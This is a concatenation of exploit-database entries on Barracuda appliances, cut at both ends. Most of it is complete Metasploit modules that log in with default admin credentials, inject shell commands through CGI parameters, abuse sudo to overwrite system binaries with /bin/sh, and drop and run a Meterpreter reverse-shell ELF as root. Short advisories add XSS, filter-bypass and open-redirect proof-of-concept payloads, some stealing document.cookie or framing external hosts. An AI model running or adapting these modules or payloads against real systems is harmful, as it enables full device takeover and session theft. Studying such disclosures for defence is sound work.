'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = Time.now.to_i
locale = "en_US"
user = "admin"
password = "admin"
enctype = "MD5"
password_entry = ""
password_clear = "admin"
password_hash, et = do_login(user, password_clear, et)
vprint_status("new password: #{password_hash} et: #{et}\n")
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
source: https://www.securityfocus.com/bid/60172/info
Barracuda SSL VPN 680 is prone to an open-redirection vulnerability.
An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Barracuda SSL VPN 680 2.2.2.203 is vulnerable; other versions may also be affected.
https://www.example.com/launchApplication.do?resourceId=1&policy=1&returnTo=%2FshowApplicationShortcuts.do
https://www.exmaple.com/launchApplication.do?resourceId=1&policy=1&returnTo=http://www.example.com
https://www.exmaple.com/[FILE].do?[RES+ID]=x&[POLICY]=x&returnTo=[EXTERNAL TARGET]
source: https://www.securityfocus.com/bid/54593/info
Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable.
www.example.com/launchAgent.do?launchId=l3ce418&returnTo=[NON-PERSISTENT SCRIPT CODE!]
source: https://www.securityfocus.com/bid/54593/info
Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable.
www.example.com/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing %20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
# Exploit Title: Barracuda Spam & Virus Firewall Post Auth Remote Root Exploit
# Date: 07/21/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/landing/pages/spamfirewall/
# Version: Spam and Virus Firewall <= 5.1.3.007
# Tested on: Spam & Virus Firewall 5.1.3.007
# CVE : None.
require 'msf/core'
require 'date'
require "base64"
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Spam & Virus Firewall (bdump.cgi) Post Auth Root Exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Barracuda Spam & Virus firewall firmware version <= 5.1.3.007 by exploiting a
vulnerability in the web administration interface.
By sending a specially crafted request it's possible to inject system
commands while escalating to root do to relaxed sudo configuration on the local
machine.
},
'Author' => [ 'xort' ], # disclosure and exploit module
'References' => [ [ 'none', 'none'] ],
'Platform' => [ 'linux'],
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'Targets' => [['Spam Firewall firmware: 5x', {}]],
'DefaultTarget' => 0 ))
register_options(
[
OptString.new('PASSWORD', [ false, 'Password', "admin" ]),
OptString.new('USERNAME', [ true, 'Admin Username', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'vars_post' =>
{
'password_clear' => password_clear,
'real_user' => "",
'login_state' => "out",
'enc_key' => enc_key,
'et' => et,
'locale' => "en_US",
'user' => username,
'password' => Digest::MD5.hexdigest(username+enc_key),
'enctype' => "MD5",
'password_entry' => "",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
# file to replace
sudo_cmd_exec = "/home/product/code/firmware/current/bin/mysql_add_cluster_user.sh"
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
vprint_status( "Running Command...\n" )
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile
vprint_status( "sending..." )
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cgi-mod/bdump.cgi",
'headers' =>
{
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Accept-Language' => "en-US,en;q=0.5"
},
'vars_get' => {
'password' => password,
'et' => et,
'user' => username,
'role' => 'admin',
'_dc' => '',
'bdb' => '`' + injection_string + '`',
'locale' => 'en_US'
}
})
end
def exploit
# params
timeout = 1550;
real_user = "";
et = Time.now.to_i
user = datastore['USERNAME']
password = datastore['PASSWORD']
# do login and get password hash
password_hash, et = do_login(user, password, et)
vprint_status("got password hash: #{password_hash}\n")
sleep(2)
# clean up hanging prior request
run_command(user, password_hash, et, ("ps -df|grep bdump|awk '{print $2}' | xargs kill -9"))
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
Document Title:
===============
Barracuda Networks Cloud Series - Filter Bypass Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=754
Barracuda Networks Security ID (BNSEC): 731
Release Date:
=============
2015-01-19
Vulnerability Laboratory ID (VL-ID):
====================================
754
Common Vulnerability Scoring System:
====================================
4.5
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products.
Vulnerability Disclosure Timeline:
==================================
2015-01-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Cloud Control Center 2014 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1.
The filter bypass issue allows an attacker to bypass the secure filter validation of the service to execute malicious script codes.
The barracuda filter blocks for example standard iframes, scripts and other invalid code context: The cloud service has a own exception-handling
to parse or encode malicious injected web context. The mechanism filters the first request and sanitizes the output in every input field.
During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked! In the next step the attacker splits (%20%20%20)
the request and injects at the end an onload frame to an external malicious source. The second iframe with the onload alert executes the script codes after
the validation encoded only the first script code tag. The second script code tag can bypass the applicance filter mechanism and executes in the web context
of affected modules. The secure validation does not recognize a splitted request which results in client-side and application-side script code execution in
the cloud series products.
The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 4.5 (medium).
Exploitation of the filter bypass vulnerability requires a low privileged application user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation
of affected or connected module context.
Vulnerable Request Method(s):
[+] POST & GET
Proof of Concept (PoC):
=======================
The filter bypass web vulnerability can be exploited by local privileged user accounts and remote attackers with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
<iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") <
PoC:
<script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script>
Solution - Fix & Patch:
=======================
The issue can be patched by a secure validation of the full message input body context of any input or request method attempt.
Ensure that the validaton does not only encode the first injected script code since a empty char arrives. Filter all web context
that runs through the requesting procedure and parse separatly to prevent script code injection attacks.
Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available in Barracuda Labs and the Customer Service.
Security Risk:
==============
The security risk of the filter bypass web vulnerability in the barracuda cloud product series is estimated as medium. (CVSS 4.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
# Exploit Title: Barracuda Load Balancer Firmware <= v6.0.1.006 (2016-08-19) PostAuth remote root exploit
#
# Date: 01/06/2017 (Originally discovered: 3/16)
# Exploit Author: xort
# Software Link: https://www.barracuda.com/products/loadbalancer
# Version: Firmware <= v6.0.1.006 (2016-08-19)
# Tested on: 6.0.1.006 (2016-08-19)
# 6.0.0.005 (2016-03-22) - checked:4/8/16
# 5.4.0.004 (2015-11-26) - checked:3/16
#
# Not Vuln: 6.1.0.003 (2017-01-17)
# CVE : CVE-2017-6320
#
# vuln: ondefined_delete_assessment trigger exploit
#
# Postauth remote root in Barracuda Load Balancer Firmware <= v6.0.1.006 for any under priviledged user with report generating
# capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain
# root.
#
# xort @ Critical Start
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Load Balancer Firmware <= v6.0.1.006 delete_assessment root exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Barracuda Load Balancer Firmware Version <= v6.0.1.006 (2016-08-19) by exploiting a
vulnerability in the web administration interface.
By sending a specially crafted request it's possible to inject system
commands while escalating to root do to relaxed sudo configuration on the local
machine.
},
'Author' =>
[
'xort', # vuln + metasploit module
],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
# file to replace
#sudo_cmd_exec = "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
sudo_cmd_exec = "/home/product/code/firmware/current/bin/rdpd"
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
vprint_status(" file = " + b64dumpfile)
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile # + " ; rm " + b64dumpfile
exploitreq = [
[ "auth_type","Local" ],
[ "et",et ],
[ "locale","en_US" ],
[ "password", password ],
[ "primary_tab", "ADVANCE" ],
[ "realm","" ],
[ "secondary_tab","advanced_system" ],
[ "user", username ],
[ "timestamp", Time.now.to_i ],
[ "UPDATE_scan_information_in_use", "xx; #{injection_string}" ], # vuln
[ "delete_assessment", Rex::Text.rand_text_numeric(20) ]
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
post_data << "--#{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
}
})
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = Time.now.to_i
locale = "en_US"
user = "admin"
password = "admin"
enctype = "MD5"
password_entry = ""
password_clear = "admin"
password_hash, et = do_login(user, password_clear, et)
vprint_status("new password: #{password_hash} et: #{et}\n")
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
# run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
run_command(user, password_hash, et, ("printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit
# Exploit Author: xort
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/webfilter
# Version: Firmware <= 5.0.0.012
# Tested on: Vx and Hardware platforms
#
# Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating
# capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain
# root. xort@blacksecurity.org
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Barracuda Firmware Version <= 5.0.0.012 by exploiting a
vulnerability in the web administration interface.
By sending a specially crafted request it's possible to inject system
commands while escalating to root do to relaxed sudo configuration on the local
machine.
},
'Author' =>
[
'xort', # metasploit module
],
'Version' => '$Revision: 12345 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{ # note: meterpreter can't run on host do to kernel 2.4 incompatabilities + this is stable
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password, et)
vprint_status( "Logging into machine with credentials...\n" )
# timeout
timeout = 1550;
# params
password_clear = "admin"
real_user = "";
login_state = "out"
enc_key = Rex::Text.rand_text_hex(32)
et = "1358817515"
locale = "en_US"
user = username
password = Digest::MD5.hexdigest(username+enc_key)
enctype = "MD5"
password_entry = ""
vprint_status( "Starting first routine...\n" )
data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login"
vprint_status( "#{data}\n" )
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'cookie' => "",
'data' => data
}, timeout)
vprint_status( "login got code: #{res.code} ... continuing to second request..." )
File.open("/tmp/output2", 'w+') {|f| f.write(res.body) }
# get rid of first yank
password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0]
vprint_status( "password got back = #{password} - et got back = #{et}\n" )
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
exploitreq = [
[ "primary_tab", "BASIC" ],
[ "secondary_tab","reports" ],
[ "realm","" ],
[ "auth_type","Local" ],
[ "user", username ],
[ "password", password ],
[ "et",et ],
[ "role","" ],
[ "locale","en_US" ],
[ "q","" ],
[ "UPDATE_new_report_time_frame","custom" ],
[ "report_start","2013-01-25 01:14" ],
[ "report_end","2013-01-25 02:14" ],
[ "type","" ],
[ "ntlm_server","" ],
[ "kerb_server","" ],
[ "local_group","changeme" ],
[ "ip_group","20.20.108.0/0.0.0.0" ],
[ "ip_address__0","" ],
[ "ip_address__1","" ],
[ "ip_address__2","" ],
[ "ip_address__3","" ],
[ "netmask__0","" ],
[ "netmask__1","" ],
[ "netmask__2","" ],
[ "netmask__3","" ],
[ "UPDATE_new_report_pattern_values","" ],
[ "UPDATE_new_report_pattern_text","" ],
[ "UPDATE_new_report_filter_destination","domain" ],
[ "filter_domain","" ],
[ "UPDATE_new_report_filter_domain","" ],
[ "UPDATE_new_report_filter_category","" ],
[ "UPDATE_new_report_exclude_from","" ],
[ "UPDATE_new_report_exclude_to","" ],
[ "UPDATE_new_report_exclude_days","" ],
[ "allow","allow" ],
[ "block","block" ],
[ "warn","warn" ],
[ "monitor","monitor" ],
[ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ],
[ "UPDATE_new_report_filter_count","10" ],
[ "UPDATE_new_report_chart_type","vbar" ],
[ "UPDATE_new_report_format","html" ],
[ "DEFAULT_new_report_group_expand","No" ],
[ "UPDATE_new_report_expand_user_count","5" ],
[ "UPDATE_new_report_expand_domain_count","5" ],
[ "UPDATE_new_report_expand_cat_count","5" ],
[ "UPDATE_new_report_expand_url_count","5" ],
[ "UPDATE_new_report_expand_threat_count","5" ],
[ "report","on" ],
[ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ],
[ "UPDATE_new_report_id","" ],
[ "UPDATE_new_report_enabled","Yes" ],
[ "secondary_scope","report" ],
[ "secondary_scope_data","" ],
[ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ],
[ "UPDATE_new_report_delivery","external" ],
[ "UPDATE_new_report_delivery_dest_email","" ],
[ "UPDATE_new_report_server","new" ],
[ "UPDATE_new_external_server_type","smb" ],
[ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ],
[ "UPDATE_new_external_server","4.4.4.4" ],
[ "UPDATE_new_external_server_port","445" ],
[ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ],
[ "UPDATE_new_external_server_password","asdf" ],
[ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ],
[ "UPDATE_new_report_frequency", "once" ],
[ "UPDATE_new_report_split", "no" ],
[ "add_report_id","Apply" ],
[ "remover","" ]
]
data = Rex::MIME::Message.new
data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30)
exploitreq.each do |xreq|
data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"")
end
post_data = data.to_s
post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------")
datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"
vprint_status( "sending..." )
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'headers' =>
{
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
if res.code == 200
vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" )
vprint_status( "password: #{password} et: #{et}\n" )
end
vprint_status( "login got code: #{res.code} from report_results.cgi\n" )
File.open("/tmp/output4", 'w+') {|f| f.write(res.body) }
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = "1358817515" #epoch time
locale = "en_US"
user = "admin"
password = ""
enctype = "MD5"
password_entry = ""
password_clear = "admin"
vprint_status("<- Encoding payload to elf string...")
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly
if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?
password_clear = "admin"
password = datastore['PASSWORD']
et = datastore['ET']
# else - if no 'CMD' string - add code for root shell
else
password, et = do_login(user, password, et)
vprint_status("new password: #{password}\n")
end
sleep(5)
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
end
run_command(user, password, et, cmd)
# create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (tar), then execute with sudo perm
cmd = "echo -ne #{encoded_elf} > /tmp/x ;"
cmd += "chmod +x /tmp/x ;"
# backup static_routes file
cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz"
cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes"
# execute elf as root
cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;"
# restore static_routes file
cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes"
run_command(user, password, et, cmd)
sleep(2)
handler
sleep(5)
end
end
source: https://www.securityfocus.com/bid/54773/info
Barracuda Email Security Service is prone to multiple HTML-injection vulnerabilities because it fails to properly validate user-supplied input.
An attacker may leverage these issues to inject hostile HTML and script code that would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.
Barracuda Email Security Service 2.0.2 is vulnerable; other versions may also be affected.
Proof of Concept:
=================
1.1
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce ...
Review: Domain Settings > Directory Services > LDAP Host
<div id="directory-services" class="module">
<h4 class="module-title">Directory Services</h4>
<div class="module-content">
<div class="warn notice" id="ldap-test-result" style=""><img src="/images/spinner1.gif"
alt="loading..."> Connecting to >"<iframe src="http://www.example1.com">@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com 0</iframe></div>
<div style="float: right;">
<a href="https://www.example2.com/domains/sync_ldap/4" class="btn"><span><span>Synchronize Now</span></span></a>
<a href="#" class="btn" id="ldap-test-btn"><span><span>Test Settings</span></span></a>
</div>
<p class="field">
<label class="label" for="ldap_host">LDAP Host:</label>
<input name="ldap_host" id="ldap_host" size="30" value=">
"<iframe src=http://www.example1.com>@gmail.com >"<script>alert(document.cookie)</script><
div style="1@gmail.com 0" type="text">
URL: https://www.example.com/domains/info/4
PoC: >">"<iframe src=http://www.example1.com>VL >"<div style="1 >">"
Note:
To bypass the validation close the tag of the exception handling on beginning with double quotes 2 times.
The mask of the exception (>") will be bypassed and the string will be executed out of the secure exception handling message.
1.2
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce ...
Vulnerable Module: Reports > Date Start > Date End
PoC: >"<iframe src=http://www.example1.com>
URL: https://www.example.com/reports
Note:
1. Include a start Date & End Date
2. Inject after the start date & end date your own persistent script code
3. Result: The script code get executed out of the date listing application context
4. Save value with script code to events for exploitation via module.
source: https://www.securityfocus.com/bid/52358/info
Barracuda CudaTel Communication Server is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
